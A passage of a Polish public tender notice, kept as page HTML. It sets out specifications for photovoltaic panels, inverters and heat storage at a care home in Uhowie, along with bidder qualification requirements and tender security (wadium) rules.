ich ukrycie pod nowo układaną elewacją. Rury osłonowe montowane na zewnątrz winne odpowiadać wymaganiom Zamawiającego oraz spełniać wymagania odpowiednich przepisów i norm.(56)	Wszelki obwody i zabezpieczenia związane z montażem systemów i urządzeń należy czytelnie i przejrzyście opisać. Opisy te winne być zgodne z istniejącymi schematami i dokumentacją techniczną(57)	Należy wykonać niezbędne pomiary obwodów pod względem spełnienia parametrów technicznych i bezpieczeństwa użytkowania (wymagane protokoły z pomiarów: skuteczności ochrony przewodów przed spięciem/zwarciem, skuteczności ochrony przeciwporażeniowej, rezystancji izolacji). Pomiary musi wykonać uprawniona osoba.8.	Wymagane parametry, funkcje i wyposażenie systemu fotowoltaicznego AC.i)	Panele PV:(58)	parametry wytrzymałościowe obciążenie statyczne nie mniejsze niż 5400 Pa potwierdzone certyfikatem niezależnej jednostki badającej,(59)	puszka przyłączeniowa o IP67,(60)	moduły wolne od efektu PID,(61)	wymagane jest dostarczenie wraz z panelami listy modułów zawierająca numery seryjne i flashtest każdego modułu mówiący o jego dokładnej mocy oraz parametrach prądowo-napięciowych,(62)	moduły muszą być wyprodukowane w 2017 roku.(63)	Certyfikat CEj)	System mocowania:(64)	konstrukcja wsporcza stalowa lub stalowo-aluminiowa (dopuszcza się zastosowane belek do montażu paneli fotowoltaicznych aluminiowych). Konstrukcja tzw. dwupodporowa, wbijana w grunt. Sposób zabudowy modułów na konstrukcji wsporczej zgodny z projektem udostepnionym przez inwestora. Konstrukcja przystosowana do montażu paneli w orientacji poziomej. W przypadku stosowania konstrukcji wielomateriałowej wymagane zabezpieczenie przed powstawaniem korozji elektrochemicznej w miejscu łączenia materiałów. (65)	do odbioru wymagane są obliczenia statyki konstrukcji wsporczej zgodnie z normami Eurokod 3(łącznie z EN 1990 i EN 1991) oraz Eurokod 7.(66)	do odbioru wymagane jest dostarczenie certyfikatu jakościowego na jakość i rodzaj powłoki antykorozyjnej konstrukcji. Certyfikat winien być wydany przez niezależną jednostkę badawczą lub certyfikującąk)	Inwerter - wymagane wskazanie w kartach katalogowych spełnienia poniższych warunków poprzez ich zaznaczenie na karcie katalogowej:(67)	typ: beztransformatorowe(68)	liczba zasilanych faz: 3 f(69)	moc pojedynczego falownika:	>= 10 kW(70)	sprawność max EU: >= 97,6 %(71)	stopień ochrony: min IP 65(72)	liczba niezależnych MPPT: >= 2(73)	protokół komunikacji	RS 485 lub analogiczny/rónoważny(74)	monitorowanie prądu uszkodzeniowego(75)	rozłącznik DC, bezpieczniki DC(76)	certyfikaty, n.p. EN 6210 /, EN 61000 / DK5940 / VDE AR-N 4015(77)	certyfikat wg normy EN 50438:2007(78)	certyfikat CE	l)	Okablowanie:(79)	do połączeń stosować przewody dedykowane do systemów fotowoltaicznych,(80)	wymagana jest zgodność z normami europejskimi,(81)	połączenia przewodów wykonywać przy pomocy złączy PV typu MC4.m)	Uszczegółowienie wymagań dla paneli PV - wymagane wskazanie w kartach katalogowych spełnienia poniższych warunków poprzez ich zaznaczenie na karcie katalogowej:(82)	moc maksymalna (-0W;+5W) Pmax: miń 250 W(83)	sprawność: >=15,3 %,(84)	współczynnik temperaturowy Pmax: nie większy niż -0,42 %/oC(85)	ilość diod bypass: minimum 3 [szt.](86)	tolerancja mocy wyłącznie dodatnia(87)	Zakres temperatur pracy: co najmniej od - 40°C do +85 °Cn)	System monitoringu ilości wytworzonej energii.(88)	rejestracja ilości wytworzonej energii OZE,o)	Inne(89)	Należy stosować zabezpieczenia urządzeń i obwodów zgodnie z istniejącą dokumentacją techniczną znajdującą się w posiadaniu Zamawiającego i z wymaganiami producenta urządzeń oraz odpowiednich norm technicznych i przepisów w zakresie instalacji elektrycznych.(90)	Ilości, rodzaj i średnice przewodów winne wynikać z dokumentacji technicznej urządzeń znajdującej się w posiadaniu Zamawiającego, wymagań producenta i przepisów w zakresie instalacji elektrycznych. Zabrania się stosowania zaniżonych przekrojów żył przewodów lub innych niż określone w projekcie typów okablowania. Przewody elektryczne należy ułożyć w sposób uzgodniony z Zamawiającym i skoordynowany z trwającymi pracami termomodernizacyjnymi w sposób zapewniający ich ukrycie pod nowo układaną elewacją. Rury osłonowe montowane na zewnątrz winne odpowiadać wymaganiom Zamawiającego oraz spełniać wymagania odpowiednich przepisów i norm.(91)	Wszelki obwody i zabezpieczenia związane z montażem systemów i urządzeń należy czytelnie i przejrzyście opisać. Opisy te winne być zgodne z istniejącymi schematami i dokumentacją techniczną.(92)	Należy wykonać niezbędne pomiary obwodów pod względem spełnienia parametrów technicznych i bezpieczeństwa użytkowania (wymagane protokoły z pomiarów: skuteczności ochrony przewodów przed spięciem/zwarciem, skuteczności ochrony przeciwporażeniowej, rezystancji izolacji). Pomiary musi wykonać uprawniona osoba.9.	Wymagania dotyczące zasobników ciepła- zbiorniki wykonane ze stali nierdzewnej kwasoodpornej o PREN (współczynniku antykorozyjności) takim jak stal 316L.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45300000-0</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45330000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331000-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09300000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09310000-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09330000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>09331000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>42511110-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45317000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45317300-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45311000-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44112000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44212000-9</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2017-12-08</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2017-12-08</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia w tym zakresie żadnych wymagań.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że:- w okresie ostatnich 5 lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) zrealizował co najmniej:o	jedno zamówienie polegające na wykonaniu instalacji fotowoltaicznej o mocy min. 20 kW orazo	jedno zamówienie obejmujące wykonanie pomp ciepła powietrze - woda o mocy min. 90 kWWykonawca nie może sumować kilku robót o mniejszej wartości dla uzyskania wymaganej wartości porównywalnej. - dysponuje osobami do realizacji zamówienia, które posiadają następujące uprawnienia do kierowania robotami w specjalności:o	1 osoba z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych,o	1 osoba z uprawieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Celem potwierdzenia wykonania w okresie ostatnich 5 lat przed terminem składania ofert: co najmniej jednego zamówienia polegającego na wykonaniu instalacji fotowoltaicznej o mocy min. 20kW oraz co najmniej jednego zamówienia obejmującego wykonanie pomp ciepła powietrze-woda o mocy min. 90 kW - Wykaz robót budowlanych, wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz, których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty - Załącznik nr 4 do SIWZ.2. Celem potwierdzenia dysponowania osobami zdolnymi do realizacji zamówienia, które posiadają następujące uprawnienia do kierowania robotami w specjalności: 1 osoba z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, gazowych, wodociągowych i kanalizacyjnych oraz 1 osoba z uprawnieniami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych - Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia publicznego, a także zakresu wykonywanych przez te osoby czynności oraz informacją o podstawie do dysponowania tymi osobami - Załącznik nr 5 do SIWZ. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1. Zamawiający wymaga, by oferta zawierała następujące dokumenty:a)	wypełniony formularz ofertowy sporządzony z wykorzystaniem wzoru stanowiącego Załącznik nr 1 do SIWZ;b)	Oświadczenia o braku przesłanek do wykluczenia oraz spełniania warunków udziału w postępowaniu - Załączniki 2 oraz 3 do SIWZ;c)	Dokumenty potwierdzające wniesienie wymaganego w postępowaniu wadium,d)	Pełnomocnictwo do podpisania oferty jeżeli upoważnienie do jej podpisania nie wynika z dokumentów rejestrowych. e)	Kartę techniczną/inny równoważny dokument pomp ciepła, potwierdzającą posiadanie wymaganych parametrów,f)	Kartę techniczną/inny równoważny dokument paneli PV ciepła, potwierdzającą posiadanie wymaganych parametrów,g)	Kartę techniczną/inny równoważny dokument regulatorów DC, potwierdzającą posiadanie wymaganych parametrów,h)	Kartę techniczną/inny równoważny dokument inwerterów, potwierdzającą posiadanie wymaganych parametrów,i)	Kartę techniczną/inny równoważny dokument grzałek, potwierdzającą posiadanie wymaganych parametrów,j)	Dokument producenta, potwierdzający długość okresu gwarancji producenta pomp ciepła,k)	Dokument producenta, potwierdzający długość okresu gwarancji producenta na ukryte wady paneli fotowoltaicznych,l)	Dokument producenta, potwierdzający długość okresu gwarancji producenta inwerterów,m)	Dokument producenta, potwierdzający długość okresu gwarancji producenta regulatorów DC,n)	Certyfikat potwierdzający parametry wytrzymałościowe paneli PV na obciążenie statyczne.2. Wykonawca, który powołuje się na zasoby innych podmiotów, w celu wykazania braku istnienia wobec nich podstaw wykluczenia oraz spełniania, w zakresie, w jakim powołuje się na ich zasoby, warunków udziału w postępowaniu zamieszcza informacje o podwykonawcach w oświadczeniu, o którym mowa w pkt. 6.1. SIWZ3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie dot. przesłanek wykluczenia z postępowania, o którym mowa w punkcie 6.1 składa każdy z wykonawców wspólnie ubiegających się o zamówienie. Z kolei, oświadczenie dot. spełniania warunków udziału w postępowaniu wykonawcy składają wspólnie.4.	Do oferty wykonawca załącza pisemne zobowiązanie podmiotu trzeciego albo inny dokument, służący wykazaniu udostępnienia wykonawcy potencjału przez podmiot trzeci w zakresie określonym w art. 22a ust. 1 ustawy Pzp (zgodnie z zał. Nr 6 do SIWZ).5. Wykonawca w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy (tj. o kwocie jaką zamierzał przeznaczyć na sfinansowanie zamówienia, firmy oraz adresów wykonawców którzy złożyli oferty w terminie, cenie, terminie wykonania zamówienia, okresu gwarancji i warunkach płatności zawartych w ofertach), przekazuje zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy. Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. </span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">1.	Oferta musi być zabezpieczona na okres związania ofertą wadium. Wadium wynosi 12 000,00 zł (słownie: dwanaście tysięcy złotych 00/100); 2. Wadium musi być wniesione najpóźniej w terminie składania ofert.3. Wadium może być wniesione w następujących formach:o	w pieniądzuo	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnymo	w gwarancjach bankowycho	w gwarancjach ubezpieczeniowycho	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. nr 109, poz. 1158 ze zmianami). UWAGA! W przypadku podmiotów ubiegających się o zamówienie wspólnie (konsorcjum firm, spółka cywilna) wadium wnoszone w formach innych, niż pieniężna winno w swojej treści wymieniać wszystkie podmioty wspólnie ubiegające się o zamówienie.4. Wadium wnoszone w pieniądzu należy wpłacić na konto Domu Pomocy Społecznej w Uhowie: 30 1020 1332 0000 1302 1061 9262 (Powszechna Kasa Oszczędności Bank Polski SA), z wyraźnym oznaczeniem w tytule transakcji, iż dotyczy ona wpłaty wadium do niniejszego postępowania. Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które do terminu składania ofert, znajdzie się na rachunku bankowym Zamawiającego. Poręczenia lub gwarancję bankową, gwarancję ubezpieczeniową należy złożyć w formie oryginału w siedzibie Zamawiającego lub przekazać za pośrednictwem poczty. Za skuteczne wniesienie wadium w poręczeniu lub gwarancji Zamawiający uważa złożenie do terminu składania ofert oryginału poręczenia lub gwarancji.5. Zamawiający niezwłocznie zwróci wadium w okolicznościach określonych w art. 46 ust. 1, 1a oraz 2 ustawy.6.	Zamawiający zatrzyma wadium wraz z odsetkami w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy, tj.a)	jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3 a ustawy, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej,b)	jeżeli wykonawca, którego oferta została wybrana:o	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;o	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;o	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> 